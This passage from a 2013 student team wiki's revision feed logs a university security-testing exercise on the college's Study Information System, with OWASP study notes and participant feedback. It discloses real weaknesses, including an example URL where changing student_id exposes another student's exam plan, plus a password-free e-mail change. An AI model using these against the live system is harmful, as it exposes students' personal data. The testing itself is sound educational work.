* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive [https://docs.google.com/document/d/1ACCHfErxIn1U__bfTr1TTRNRRLJM9F2rZZ9dttgjed8/edit (Final Documentation)].&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
Our final documentation can be found from Google Drive.&lt;br /&gt;
[https://docs.google.com/document/d/1ACCHfErxIn1U__bfTr1TTRNRRLJM9F2rZZ9dttgjed8/edit Final Documentation]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;NB! This can be updated in a few hours or so?&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==IP Feedback==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
* &#039;&#039;&#039;What I did like: &#039;&#039;&#039;&lt;br /&gt;
** I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time.&lt;br /&gt;
** Multicultural groups, where all the participants are from different countries.&lt;br /&gt;
** I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.&lt;br /&gt;
** I enjoyed out-of-schedule activities. For example, I liked visiting Skype, TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling &amp;quot;competition&amp;quot; and it was fun!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like: &#039;&#039;&lt;br /&gt;
** I did not like that we had to sit so much in lectures. :) (Wanted to stretch some more)&lt;br /&gt;
** From time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don&#039;t know the purpose yet, but you will find it out in the future.&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in a team on a real-life problem.&lt;br /&gt;
** Practising problem-solving and working as a team.&lt;br /&gt;
** Learned a lot of new stuff.&lt;br /&gt;
** Organisation - well done&lt;br /&gt;
** Had a wonderful team!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** A couple of days short of time - as usual...&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Everything was organized really well.&lt;br /&gt;
** I liked the arranged events like sauna, visiting Skype and Tallinn teletorn.&lt;br /&gt;
** Everything was also free for us except the beer.&lt;br /&gt;
** I met many new interesting people and got to know about their cultures.&lt;br /&gt;
** I got new friends for life.&lt;br /&gt;
** Our project was interesting and i learned new skills.&lt;br /&gt;
** I also liked FREE water, Estonian girls and Americana pizza place.&lt;br /&gt;
** This IP was one of my best experiences ever.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Lack of free time&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** It was nice to meet new people and get new friends from different cultures.&lt;br /&gt;
** Also all the events that was arranged were very funny, specially sauna-event!  &lt;br /&gt;
** Visiting Skype office was something that you don’t get to do everyday!&lt;br /&gt;
** Free food!&lt;br /&gt;
** Everything was well organized and teachers were truly interested about this intensive course!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** First of all, i would like thank you everyone!&lt;br /&gt;
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Not so much free time T.T&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Accommodation&lt;br /&gt;
** The equipment we used&lt;br /&gt;
** The capabilities and expertise of the professors&lt;br /&gt;
** The overall quality of teaching&lt;br /&gt;
** The expected learning outcomes&lt;br /&gt;
** The activities besides the general course&lt;br /&gt;
** Friendly environment&lt;br /&gt;
** Working in teams. Thanks guys!&lt;br /&gt;
** Free water&lt;br /&gt;
** Tasty food&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** To long working hours&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in teams.&lt;br /&gt;
** Meeting new people.&lt;br /&gt;
** Seeing new places.&lt;br /&gt;
** Learning new things.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
** Brainstorming after whole day of lectures.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62419</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62419"/>
		<updated>2013-04-05T09:03:28Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Final documentation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
